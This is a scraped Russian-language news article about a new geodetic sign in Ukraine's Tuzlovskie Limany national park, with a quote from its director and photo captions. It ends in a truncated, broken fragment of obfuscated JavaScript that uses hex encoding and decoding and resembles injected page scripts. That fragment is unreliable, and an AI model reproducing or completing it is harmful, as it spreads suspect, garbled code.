В Одесской области появился новый интересный геодезический знак (фото) «фото»

В Одесской области появился новый интересный геодезический знак (фото)

 

2 (8)

фото: Facebook / Иван Русев

Как сообщает корреспондент Украинской Службы Информации, об установке знака сообщил на своей странице в соцсети Facebook директор нацпарка Иван Русев.

Знак установлен в НПП «Тузловские лиманы» на берегу лимана Бурнас в зоне уникального курорта украинского Причерноморья — «Лебедевка». Его установка была приурочена к 5 июня – Всемирному дню охраны окружающей природной среды.

Такая акция была спланирована нами, как только в Минприроды назначили меня управлять нацпарком. Все что я пишу на своей странице ФБ о НПП «Тузловские лиманы» – это суть моей жизненной позиции и моего профессионального подхода к делу. А знак – лишь символ подхода к любимому делу и объединения сил и духа всех моих коллег. Хотел бы поблагодарить всех своих друзей, всех неравнодушных людей, кто материально и творчески помог, чтобы этот праздник и этот информационно-туристический памятник состоялся. Очень надеюсь, что он будет привлекательным для развития туризма в Одесской области, – сообщил Иван Русев.

3 (5)

фото: Facebook / Иван Русев

1 (11)

фото: Facebook / Иван Русев

4 (4)

фото: Facebook / Иван Русев

Как сообщала USIonline.com, в заповеднике Одесской области наступила «испанская идиллия».

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "usionline.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e